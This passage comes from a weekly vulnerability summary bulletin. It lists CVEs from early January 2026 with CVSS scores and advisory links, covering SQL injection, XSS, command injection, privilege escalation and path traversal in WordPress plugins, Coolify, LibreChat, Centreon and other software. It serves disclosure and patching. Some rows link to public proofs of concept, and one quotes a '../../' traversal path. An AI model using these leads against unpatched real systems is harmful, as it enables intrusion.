| Zhiyuan-Zhyuan | Cross site scripting vulnerability in seeyon Zhiyuan A8+ Collaborative Management Software 7.0 via the topValue parameter to the seeyon/main.do endpoint. | 2026-01-16 | not yet calculated | CVE-2025-56451 | https://www.yuque.com/076w/syst1m/zlp7c6hmowx6cg51?singleDoc https://gist.github.com/076w/b223381ba06b05845d919fb29619777b |
Vulnerability Summary for the Week of January 5, 2026
Posted on Monday January 12, 2026
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| AA-Team--Amazon Native Shopping Recommendations | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AA-Team Amazon Native Shopping Recommendations allows SQL Injection. This issue affects Amazon Native Shopping Recommendations: from n/a through 1.3. | 2026-01-05 | 9.3 | CVE-2025-30633 | https://vdp.patchstack.com/database/wordpress/plugin/woozone-contextual/vulnerability/wordpress-amazon-native-shopping-recommendations-plugin-1-3-sql-injection-vulnerability?_s_id=cve |
| AA-Team--Premium Age Verification / Restriction for WordPress | Incorrect Privilege Assignment vulnerability in AA-Team Premium Age Verification / Restriction for WordPress, AA-Team Responsive Coming Soon Landing Page / Holding Page for WordPress allows Privilege Escalation. This issue affects Premium Age Verification / Restriction for WordPress: from n/a through 3.0.2; Responsive Coming Soon Landing Page / Holding Page for WordPress: from n/a through 3.0. | 2026-01-06 | 8.8 | CVE-2025-29004 | https://patchstack.com/database/wordpress/plugin/age-restriction/vulnerability/wordpress-premium-age-verification-restriction-for-wordpress-plugin-3-0-2-privilege-escalation-vulnerability?_s_id=cve https://patchstack.com/database/wordpress/plugin/wordpress-flat-countdown/vulnerability/wordpress-responsive-coming-soon-landing-page-holding-page-for-wordpress-3-0-privilege-escalation-vulnerability?_s_id=cve |
| AA-Team--Premium SEO Pack | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AA-Team Premium SEO Pack allows SQL Injection. This issue affects Premium SEO Pack: from n/a through 3.3.2. | 2026-01-05 | 8.5 | CVE-2025-31044 | https://vdp.patchstack.com/database/wordpress/plugin/premium-seo-pack/vulnerability/wordpress-premium-seo-pack-3-3-2-sql-injection-vulnerability?_s_id=cve |
| AA-Team--Woocommerce Sales Funnel Builder | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AA-Team Woocommerce Sales Funnel Builder, AA-Team Amazon Affiliates Addon for WPBakery Page Builder (formerly Visual Composer) allows Reflected XSS. This issue affects Woocommerce Sales Funnel Builder: from n/a through 1.1; Amazon Affiliates Addon for WPBakery Page Builder (formerly Visual Composer): from n/a through 1.2. | 2026-01-06 | 7.1 | CVE-2025-30631 | https://patchstack.com/database/wordpress/plugin/woosales/vulnerability/wordpress-woocommerce-sales-funnel-builder-plugin-1-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve https://patchstack.com/database/wordpress/plugin/azon-addon-js-composer/vulnerability/wordpress-amazon-affiliates-addon-for-wpbakery-page-builder-formerly-visual-composer-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ABB--WebPro SNMP Card PowerValue | Incorrect Implementation of Authentication Algorithm vulnerability in ABB WebPro SNMP Card PowerValue, ABB WebPro SNMP Card PowerValue UL. This issue affects WebPro SNMP Card PowerValue: through 1.1.8.K; WebPro SNMP Card PowerValue UL: through 1.1.8.K. | 2026-01-07 | 8.8 | CVE-2025-4676 | https://search.abb.com/library/Download.aspx?DocumentID=2CRT000009&LanguageCode=en&DocumentPartId=&Action=Launch |
| Adtecdigital--SignEdje Digital Signage Player | Adtec Digital SignEdje Digital Signage Player v2.08.28 contains multiple hardcoded default credentials that allow unauthenticated remote access to web, telnet, and SSH interfaces. Attackers can exploit these credentials to gain root-level access and execute system commands across multiple Adtec Digital product versions. | 2026-01-06 | 7.5 | CVE-2020-36915 | ExploitDB-48954 Adtec Digital Official Homepage Zero Science Lab Disclosure (ZSL-2020-5603) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange VulnCheck Advisory: Adtec Digital SignEdje Digital Signage Player v2.08.28 Default Credentials |
| aio-libs--aiohttp | AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below allow a zip bomb to be used to execute a DoS against the AIOHTTP server. An attacker may be able to send a compressed request that when decompressed by AIOHTTP could exhaust the host's memory. This issue is fixed in version 3.13.3. | 2026-01-05 | 7.5 | CVE-2025-69223 | https://github.com/aio-libs/aiohttp/security/advisories/GHSA-6mq8-rvhq-8wgg https://github.com/aio-libs/aiohttp/commit/2b920c39002cee0ec5b402581779bbaaf7c9138a |
| aksharsoftsolutions--AS Password Field In Default Registration Form | The AS Password Field In Default Registration Form plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 2.0.0. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account. | 2026-01-06 | 9.8 | CVE-2025-14996 | https://www.wordfence.com/threat-intel/vulnerabilities/id/061f022b-b922-4499-bb34-8ea91ba5ace3?source=cve https://plugins.trac.wordpress.org/browser/as-password-field-in-default-registration-form/tags/2.0.0/as-password-field-default-registration.php |
| Alibaba--Fastjson | Fastjson before 1.2.48 mishandles autoType because, when an @type key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an attacker-supplied payload located elsewhere in that JSON document. This was exploited in the wild in 2023 through 2025. NOTE: this issue exists because of an incomplete fix for CVE-2017-18349. Also, a later bypass is covered by CVE-2022-25845. | 2026-01-09 | 10 | CVE-2025-70974 | https://github.com/alibaba/fastjson/compare/1.2.47...1.2.48 https://www.seebug.org/vuldb/ssvid-98020 https://www.cnvd.org.cn/flaw/show/CNVD-2019-22238 https://www.freebuf.com/vuls/208339.html https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce https://www.cloudsek.com/blog/androxgh0st-continues-exploitation-operators-compromise-a-us-university-for-hosting-c2-logger https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955 |
| arraytics--Eventin Event Manager, Event Booking, Calendar, Tickets and Registration Plugin (AI Powered) | The Eventin - Event Manager, Events Calendar, Event Tickets and Registrations plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'post_settings' function in all versions up to, and including, 4.0.51. This makes it possible for unauthenticated attackers to modify plugin settings. Furthermore, due to insufficient input sanitization and output escaping on the 'etn_primary_color' setting, this enables unauthenticated attackers to inject arbitrary web scripts that will execute whenever a user accesses a page where Eventin styles are loaded. | 2026-01-09 | 7.2 | CVE-2025-14657 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e4188b26-80f8-41b8-be19-1ddcbd7e39f5?source=cve https://plugins.trac.wordpress.org/changeset/3429942/wp-event-solution/trunk/base/Enqueue/register.php?old=3390273&old_path=wp-event-solution%2Ftrunk%2Fbase%2FEnqueue%2Fregister.php https://plugins.trac.wordpress.org/changeset/3429942/wp-event-solution/trunk/base/api-handler.php?old=3390273&old_path=wp-event-solution%2Ftrunk%2Fbase%2Fapi-handler.php https://plugins.trac.wordpress.org/changeset/3429942/wp-event-solution/trunk/core/event/api.php?old=3390273&old_path=wp-event-solution%2Ftrunk%2Fcore%2Fevent%2Fapi.php |
| Arteco-Global--Arteco Web Client DVR/NVR | Arteco Web Client DVR/NVR contains a session hijacking vulnerability with insufficient session ID complexity that allows remote attackers to bypass authentication. Attackers can brute force session IDs within a specific numeric range to obtain valid sessions and access live camera streams without authorization. | 2026-01-06 | 9.8 | CVE-2020-36925 | ExploitDB-49348 Arteco Official Vendor Homepage Zero Science Lab Disclosure (ZSL-2020-5613) Packet Storm Security Exploit Archive IBM X-Force Exchange Vulnerability Entry 1 IBM X-Force Exchange Vulnerability Entry 2 CXSecurity Vulnerability Listing VulnCheck Advisory: Arteco Web Client DVR/NVR Session ID Brute Force Authentication Bypass |
| AWS--Kiro IDE | Processing specially crafted workspace folder names could allow for arbitrary command injection in the Kiro GitLab Merge-Request helper in Kiro IDE before version 0.6.18 when opening maliciously crafted workspaces. To mitigate, users should update to the latest version. | 2026-01-09 | 7.8 | CVE-2026-0830 | https://kiro.dev/changelog/spec-correctness-and-cli/ https://aws.amazon.com/security/security-bulletins/2026-001-AWS/ |
| bg5sbk--MiniCMS | A vulnerability was found in bg5sbk MiniCMS up to 1.8. The impacted element is an unknown function of the file /minicms/mc-admin/post.php of the component Trash File Restore Handler. Performing a manipulation results in improper authentication. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 7.3 | CVE-2025-15457 | VDB-339490 \| bg5sbk MiniCMS Trash File Restore post.php improper authentication VDB-339490 \| CTI Indicators (IOB, IOC, IOA) Submit #725139 \| MiniCMS https://github.com/bg5sbk/MiniCMS V1.8 unauthorized vulnerability https://github.com/ueh1013/VULN/issues/12 |
| bg5sbk--MiniCMS | A vulnerability was determined in bg5sbk MiniCMS up to 1.8. This affects an unknown function of the file /mc-admin/post-edit.php of the component Article Handler. Executing a manipulation can lead to improper authentication. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 7.3 | CVE-2025-15458 | VDB-339491 \| bg5sbk MiniCMS Article post-edit.php improper authentication VDB-339491 \| CTI Indicators (IOB, IOC, IOA) Submit #725142 \| MiniCMS https://github.com/bg5sbk/MiniCMS V1.8 unauthorized vulnerability https://github.com/ueh1013/VULN/issues/9 |
| Brecht--Custom Related Posts | Insertion of Sensitive Information Into Sent Data vulnerability in Brecht Custom Related Posts allows Retrieve Embedded Sensitive Data. This issue affects Custom Related Posts: from n/a through 1.8.0. | 2026-01-05 | 7.5 | CVE-2025-68033 | https://vdp.patchstack.com/database/wordpress/plugin/custom-related-posts/vulnerability/wordpress-custom-related-posts-plugin-1-8-0-sensitive-data-exposure-vulnerability?_s_id=cve |
| buddydev--BuddyPress Xprofile Custom Field Types | The BuddyPress Xprofile Custom Field Types plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'delete_field' function in all versions up to, and including, 1.2.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). | 2026-01-06 | 7.2 | CVE-2025-14997 | https://www.wordfence.com/threat-intel/vulnerabilities/id/89a7a717-dac3-490e-89dd-268be8eb7bf5?source=cve https://plugins.trac.wordpress.org/browser/bp-xprofile-custom-field-types/tags/1.2.8/src/handlers/class-field-upload-helper.php https://plugins.trac.wordpress.org/changeset/3430565/bp-xprofile-custom-field-types |
| CAYIN Technology--SMP-8000QD | Cayin Signage Media Player 3.0 contains an authenticated remote command injection vulnerability in system.cgi and wizard_system.cgi pages. Attackers can exploit the 'NTP_Server_IP' parameter with default credentials to execute arbitrary shell commands as root. | 2026-01-06 | 8.8 | CVE-2020-36910 | ExploitDB-48557 Cayin Technology Official Website Zero Science Lab Disclosure (ZSL-2020-5569) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange CXSecurity Vulnerability Listing VulnCheck Advisory: Cayin Signage Media Player 3.0 Authenticated Remote Command Injection via NTP Parameter |
| Centreon--Infra Monitoring | Missing Authentication for Critical Function vulnerability in Centreon Infra Monitoring centreon-awie (Awie import module) allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Infra Monitoring: from 25.10.0 before 25.10.2, from 24.10.0 before 24.10.3, from 24.04.0 before 24.04.3. | 2026-01-05 | 9.8 | CVE-2025-15026 | https://github.com/centreon/centreon/releases https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-15026-centreon-awie-critical-severity-5357 |
| Centreon--Infra Monitoring | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Centreon Infra Monitoring (Awie export modules) allows SQL Injection to unauthenticated user. This issue affects Infra Monitoring: from 25.10.0 before 25.10.2, from 24.10.0 before 24.10.3, from 24.04.0 before 24.04.3. | 2026-01-05 | 9.8 | CVE-2025-15029 | https://github.com/centreon/centreon/releases https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-15029-centreon-awie-critical-severity-5356 |
| Centreon--Infra Monitoring | In the backup parameters, a user with high privilege is able to concatenate custom instructions to the backup setup. Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Centreon Infra Monitoring (Backup configuration in the administration setup modules) allows OS Command Injection. This issue affects Infra Monitoring: from 25.10.0 before 25.10.2, from 24.10.0 before 24.10.15, from 24.04.0 before 24.04.19. | 2026-01-05 | 7.2 | CVE-2025-5965 | https://github.com/centreon/centreon/releases https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-5965-centreon-web-high-severity-5362 |
| code-projects--Intern Membership Management System | A vulnerability was determined in code-projects Intern Membership Management System 1.0. Affected is an unknown function of the file /intern/admin/check_admin.php. Executing a manipulation of the argument Username can lead to sql injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. | 2026-01-08 | 7.3 | CVE-2026-0700 | VDB-339977 \| code-projects Intern Membership Management System check_admin.php sql injection VDB-339977 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #733001 \| code-projects Intern Membership Management System check_admin.php 1.0 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/Intern%20Membership%20Management%20System/Intern%20Membership%20Management%20System%20check_admin.php%20sql%20injection.md https://code-projects.org/ |
| code-projects--Online Music Site | A security vulnerability has been detected in code-projects Online Music Site 1.0. Affected by this vulnerability is an unknown functionality of the file /login.php. Such manipulation of the argument username/password leads to sql injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. | 2026-01-05 | 7.3 | CVE-2026-0605 | VDB-339549 \| code-projects Online Music Site login.php sql injection VDB-339549 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #731695 \| code-projects https://code-projects.org/online-music-site-in-php-with-source-code/ 1.0 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/Online%20Music%20Site/SQL%E6%B3%A8%E5%85%A52.md https://github.com/xkalami-Tta0/CVE/blob/main/Online%20Music%20Site/SQL%E6%B3%A8%E5%85%A52.md#vulnerability-details-and-poc https://code-projects.org/ |
| code-projects--Online Music Site | A vulnerability was detected in code-projects Online Music Site 1.0. Affected by this issue is some unknown functionality of the file /FrontEnd/Albums.php. Performing a manipulation of the argument ID results in sql injection. It is possible to initiate the attack remotely. The exploit is now public and may be used. | 2026-01-05 | 7.3 | CVE-2026-0606 | VDB-339550 \| code-projects Online Music Site Albums.php sql injection VDB-339550 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #731696 \| code-projects https://code-projects.org/online-music-site-in-php-with-source-code/ 1.0 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/Online%20Music%20Site/SQL%E6%B3%A8%E5%85%A51.md https://github.com/xkalami-Tta0/CVE/blob/main/Online%20Music%20Site/SQL%E6%B3%A8%E5%85%A51.md#vulnerability-details-and-poc https://code-projects.org/ |
| code-projects--Online Music Site | A flaw has been found in code-projects Online Music Site 1.0. This affects an unknown part of the file /Administrator/PHP/AdminViewSongs.php. Executing a manipulation of the argument ID can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used. | 2026-01-05 | 7.3 | CVE-2026-0607 | VDB-339551 \| code-projects Online Music Site AdminViewSongs.php sql injection VDB-339551 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #731697 \| code-projects https://code-projects.org/online-music-site-in-php-with-source-code/ 1.0 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/Online%20Music%20Site/SQL%E6%B3%A8%E5%85%A53.md https://github.com/xkalami-Tta0/CVE/blob/main/Online%20Music%20Site/SQL%E6%B3%A8%E5%85%A53.md#vulnerability-details-and-poc https://code-projects.org/ |
| code-projects--Online Music Site | A vulnerability was identified in code-projects Online Music Site 1.0. The affected element is an unknown function of the file /Administrator/PHP/AdminAddUser.php. The manipulation of the argument txtusername leads to sql injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. | 2026-01-11 | 7.3 | CVE-2026-0851 | VDB-340446 \| code-projects Online Music Site AdminAddUser.php sql injection VDB-340446 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #733644 \| Code-Projects Online Music Site V1.0 SQLinjection https://github.com/tuo159515/sql-injection/issues/2 https://code-projects.org/ |
| code-projects--Online Product Reservation System | A security flaw has been discovered in code-projects Online Product Reservation System 1.0. This vulnerability affects unknown code of the file app/user/login.php of the component User Login. The manipulation of the argument emailadd results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-01-05 | 7.3 | CVE-2026-0583 | VDB-339475 \| code-projects Online Product Reservation System User Login login.php sql injection VDB-339475 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #731093 \| code-projects Online Product Reservation system V1.0 SQL Injection https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_login.php.md https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_login.php.md#poc https://code-projects.org/ |
| code-projects--Online Product Reservation System | A security vulnerability has been detected in code-projects Online Product Reservation System 1.0. Impacted is an unknown function of the file /order_view.php of the component GET Parameter Handler. Such manipulation of the argument transaction_id leads to sql injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. | 2026-01-05 | 7.3 | CVE-2026-0585 | VDB-339477 \| code-projects Online Product Reservation System GET Parameter order_view.php sql injection VDB-339477 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #731096 \| code-projects Online Product Reservation system V1.0 SQL Injection https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_order_view.php.md https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_order_view.php.md#poc https://code-projects.org/ |
| code-projects--Online Product Reservation System | A vulnerability was found in code-projects Online Product Reservation System 1.0. Impacted is an unknown function of the component Administration Backend. The manipulation results in improper authentication. The attack may be performed from remote. The exploit has been made public and could be used. | 2026-01-05 | 7.3 | CVE-2026-0589 | VDB-339499 \| code-projects Online Product Reservation System Administration Backend improper authentication VDB-339499 \| CTI Indicators (IOB, IOC) Submit #731127 \| code-projects Online Product Reservation System V1.0 Authentication Bypass Issues https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/auth_bypass_admin_panel.md https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/auth_bypass_admin_panel.md#poc https://code-projects.org/ |
| code-projects--Online Product Reservation System | A security flaw has been discovered in code-projects Online Product Reservation System 1.0. This affects an unknown function of the file /handgunner-administrator/register_code.php of the component User Registration Handler. Performing a manipulation of the argument fname/lname/address/city/province/country/zip/tel_no/email/username results in sql injection. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. | 2026-01-05 | 7.3 | CVE-2026-0592 | VDB-339502 \| code-projects Online Product Reservation System User Registration register_code.php sql injection VDB-339502 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #731130 \| code-projects Online Product Reservation System V1.0 SQL Injection https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_register_code.php.md https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_register_code.php.md#poc https://code-projects.org/ |
| codename065--Download Manager | The Download Manager plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.3.40. This is due to the plugin not properly validating a user's identity prior to updating their details like password. This makes it possible for unauthenticated attackers to change user's passwords, except administrators, and leverage that to gain access to their account. | 2026-01-06 | 7.3 | CVE-2025-15364 | https://www.wordfence.com/threat-intel/vulnerabilities/id/067031e8-6aa8-451c-a318-b1848c7a4f92?source=cve https://plugins.trac.wordpress.org/browser/download-manager/tags/3.3.40/src/__/Crypt.php#L18 https://plugins.trac.wordpress.org/changeset/3431915/download-manager#file7 |
| Codepeople--Sell Downloads | Missing Authorization vulnerability in Codepeople Sell Downloads allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Sell Downloads: from n/a through 1.1.12. | 2026-01-05 | 7.5 | CVE-2025-68850 | https://vdp.patchstack.com/database/wordpress/plugin/sell-downloads/vulnerability/wordpress-sell-downloads-plugin-1-1-12-broken-access-control-vulnerability?_s_id=cve |
| Columbia Weather Systems--MicroServer | An unused function in MicroServer can start a reverse SSH connection to a vendor registered domain, without mutual authentication. An attacker on the local network with admin access to the web server, and the ability to manipulate DNS responses, can redirect the SSH connection to an attacker controlled device. | 2026-01-07 | 8.8 | CVE-2025-61939 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-006-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-006-01.json |
| Columbia Weather Systems--MicroServer | An unused webshell in MicroServer allows unlimited login attempts, with sudo rights on certain files and directories. An attacker with admin access to MicroServer can gain limited shell access, enabling persistence through reverse shells, and the ability to modify or remove data stored in the file system. | 2026-01-07 | 8 | CVE-2025-66620 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-006-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-006-01.json |
| Comfy-Org--ComfyUI-Manager | ComfyUI-Manager is an extension designed to enhance the usability of ComfyUI. Prior to versions 3.39.2 and 4.0.5, an attacker can inject special characters into HTTP query parameters to add arbitrary configuration values to the config.ini file. This can lead to security setting tampering or modification of application behavior. This issue has been patched in versions 3.39.2 and 4.0.5. | 2026-01-10 | 7.5 | CVE-2026-22777 | https://github.com/Comfy-Org/ComfyUI-Manager/security/advisories/GHSA-562r-8445-54r2 https://github.com/Comfy-Org/ComfyUI-Manager/commit/f4fa394e0f03b013f1068c96cff168ad10bd0410 |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.420.7, the Git Repository field during project creation is vulnerable to command injection. User input is not properly sanitized, allowing attackers to inject arbitrary shell commands that execute on the underlying server during the deployment workflow. A regular member user can exploit this vulnerability. Version 4.0.0-beta.420.7 contains a patch for the issue. | 2026-01-05 | 10 | CVE-2025-59157 | https://github.com/coollabsio/coolify/security/advisories/GHSA-5cg9-38qj-8mc3 |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. In Coolify versions prior to and including v4.0.0-beta.434, low privileged users are able to see the private key of the root user on the Coolify instance. This allows them to ssh to the server and authenticate as root user, using the private key. As of time of publication, it is unclear if a patch is available. | 2026-01-05 | 10 | CVE-2025-64420 | https://github.com/coollabsio/coolify/security/advisories/GHSA-qwxj-qch7-whpc |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.445, parameters coming from docker-compose.yaml are not sanitized when used in commands. If a victim user creates an application from an attacker repository (using build pack "docker compose"), the attacker can execute commands on the Coolify instance as root. Version 4.0.0-beta.445 fixes the issue. | 2026-01-05 | 9.7 | CVE-2025-64419 | https://github.com/coollabsio/coolify/security/advisories/GHSA-234r-xrrg-m8f3 https://github.com/coollabsio/coolify/commit/f86ccfaa9af572a5487da8ea46b0a125a4854cf6 |
| coreruleset--coreruleset | The OWASP core rule set (CRS) is a set of generic attack detection rules for use with compatible web application firewalls. Prior to versions 4.22.0 and 3.3.8, the current rule 922110 has a bug when processing multipart requests with multiple parts. When the first rule in a chain iterates over a collection (like `MULTIPART_PART_HEADERS`), the capture variables (`TX:0`, `TX:1`) get overwritten with each iteration. Only the last captured value is available to the chained rule, which means malicious charsets in earlier parts can be missed if a later part has a legitimate charset. Versions 4.22.0 and 3.3.8 patch the issue. | 2026-01-08 | 9.3 | CVE-2026-21876 | https://github.com/coreruleset/coreruleset/security/advisories/GHSA-36fv-25j3-r2c5 https://github.com/coreruleset/coreruleset/commit/80d80473abf71bd49bf6d3c1ab221e3c74e4eb83 https://github.com/coreruleset/coreruleset/commit/9917985de09a6cf38b3261faf9105e909d67a7d6 https://github.com/coreruleset/coreruleset/releases/tag/v3.3.8 https://github.com/coreruleset/coreruleset/releases/tag/v4.22.0 |
| Corourke--iPhone Webclip Manager | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Corourke iPhone Webclip Manager allows Stored XSS. This issue affects iPhone Webclip Manager: from n/a through 0.5. | 2026-01-05 | 7.1 | CVE-2024-53735 | https://vdp.patchstack.com/database/wordpress/plugin/iphone-webclip-manager/vulnerability/wordpress-iphone-webclip-manager-plugin-0-5-csrf-to-stored-xss-vulnerability?_s_id=cve |
| danny-avila--LibreChat | LibreChat is a ChatGPT clone with additional features. Version 0.8.1-rc2 is prone to a server-side request forgery (SSRF) vulnerability due to missing restrictions of the Actions feature in the default configuration. LibreChat enables users to configure agents with predefined instructions and actions that can interact with remote services via OpenAPI specifications, supporting various HTTP methods, parameters, and authentication methods including custom headers. By default, there are no restrictions on accessible services, which means agents can also access internal components like the RAG API included in the default Docker Compose setup. This issue is fixed in version 0.8.1-rc2. | 2026-01-07 | 9.1 | CVE-2025-69222 | https://github.com/danny-avila/LibreChat/security/advisories/GHSA-rgjq-4q58-m3q8 https://github.com/danny-avila/LibreChat/commit/3b41e392ba5c0d603c1737d8582875e04eaa6e02 https://github.com/danny-avila/LibreChat/releases/tag/v0.8.2-rc2 |
| danny-avila--LibreChat | LibreChat is a ChatGPT clone with additional features. Version 0.8.1-rc2 does not enforce proper access control for file uploads to an agents file context and file search. An authenticated attacker with access to the agent ID can change the behavior of arbitrary agents by uploading new files to the file context or file search, even if they have no permissions for this agent. This issue is fixed in version 0.8.2-rc2. | 2026-01-07 | 7.1 | CVE-2025-69220 | https://github.com/danny-avila/LibreChat/security/advisories/GHSA-xcmf-rpmh-hg59 https://github.com/danny-avila/LibreChat/commit/4b9c6ab1cb9de626736de700c7981f38be08d237 https://cwe.mitre.org/data/definitions/284.html https://cwe.mitre.org/data/definitions/862.html https://github.com/danny-avila/LibreChat/releases/tag/v0.8.2-rc2 https://owasp.org/Top10/A01_2021-Broken_Access_Control https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/05-Authorization_Testing/02-Testing_for_Bypassing_Authorization_Schema.html https://raw.githubusercontent.com/OWASP/ASVS/v5.0.0/5.0/OWASP_Application_Security_Verification_Standard_5.0.0_en.pdf |
| Dasinfomedia--WPCHURCH | Incorrect Privilege Assignment vulnerability in Dasinfomedia WPCHURCH allows Privilege Escalation. This issue affects WPCHURCH: from n/a through 2.7.0. | 2026-01-07 | 8.8 | CVE-2025-31643 | https://patchstack.com/database/wordpress/plugin/church-management/vulnerability/wordpress-wpchurch-2-7-0-privilege-escalation-vulnerability?_s_id=cve |
| Dasinfomedia--WPCHURCH | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dasinfomedia WPCHURCH allows Reflected XSS. This issue affects WPCHURCH: from n/a through 2.7.0. | 2026-01-06 | 7.1 | CVE-2025-31642 | https://patchstack.com/database/wordpress/plugin/church-management/vulnerability/wordpress-wpchurch-plugin-2-7-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Dell--Unisphere for PowerMax | Dell Unisphere for PowerMax, version(s) 9.2.4.x, contain(s) an Improper Restriction of XML External Entity Reference vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access to data and resources outside of the intended sphere of control. | 2026-01-06 | 7.6 | CVE-2025-36589 | https://www.dell.com/support/kbdoc/en-us/000402262/dsa-2025-425-dell-powermaxos-dell-powermax-eem-dell-unisphere-for-powermax-dell-unisphere-for-powermax-virtual-appliance-dell-unisphere-360-dell-solutions-enabler-virtual-appliance-security-update-for-multiple-vulnerabilities |
| devolo AG--devolo dLAN Cockpit | devolo dLAN Cockpit 4.3.1 contains an unquoted service path vulnerability in the 'DevoloNetworkService' that allows local non-privileged users to potentially execute arbitrary code. Attackers can exploit the insecure service path configuration by inserting malicious code in the system root path to execute with elevated privileges during application startup or system reboot. | 2026-01-07 | 8.4 | CVE-2019-25231 | Zero Science Lab Vulnerability Advisory Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing IBM X-Force Vulnerability Exchange Devolo Vendor Homepage |
| DevToys-app--DevToys | DevToys is a desktop app for developers. In versions from 2.0.0.0 to before 2.0.9.0, a path traversal vulnerability exists in the DevToys extension installation mechanism. When processing extension packages (NUPKG archives), DevToys does not sufficiently validate file paths contained within the archive. A malicious extension package could include crafted file entries such as ../../target-file, causing the extraction process to write files outside the intended extensions directory. This flaw enables an attacker to overwrite arbitrary files on the user's system with the privileges of the DevToys process. Depending on the environment, this may lead to code execution, configuration tampering, or corruption of application or system files. This issue has been patched in version 2.0.9.0. | 2026-01-10 | 8.8 | CVE-2026-22685 | https://github.com/DevToys-app/DevToys/security/advisories/GHSA-ggxr-h6fm-p2qh https://github.com/DevToys-app/DevToys/pull/1643 https://github.com/DevToys-app/DevToys/commit/02fb7d46d9c663a4ee6ed968baa6a8810405047f |
| Digital zoom studio--DZS Video Gallery | Deserialization of Untrusted Data vulnerability in Digital zoom studio DZS Video Gallery allows Object Injection. This issue affects DZS Video Gallery: from n/a through 12.37. | 2026-01-07 | 9.8 | CVE-2025-47552 | https://patchstack.com/database/wordpress/plugin/dzs-videogallery/vulnerability/wordpress-dzs-video-gallery-12-25-php-object-injection-vulnerability?_s_id=cve |
| Digital zoom studio--DZS Video Gallery | Deserialization of Untrusted Data vulnerability in Digital zoom studio DZS Video Gallery allows Object Injection. This issue affects DZS Video Gallery: from n/a through 12.25. | 2026-01-06 | 8.8 | CVE-2025-47553 | https://patchstack.com/database/wordpress/plugin/dzs-videogallery/vulnerability/wordpress-dzs-video-gallery-plugin-12-25-php-object-injection-vulnerability?_s_id=cve |
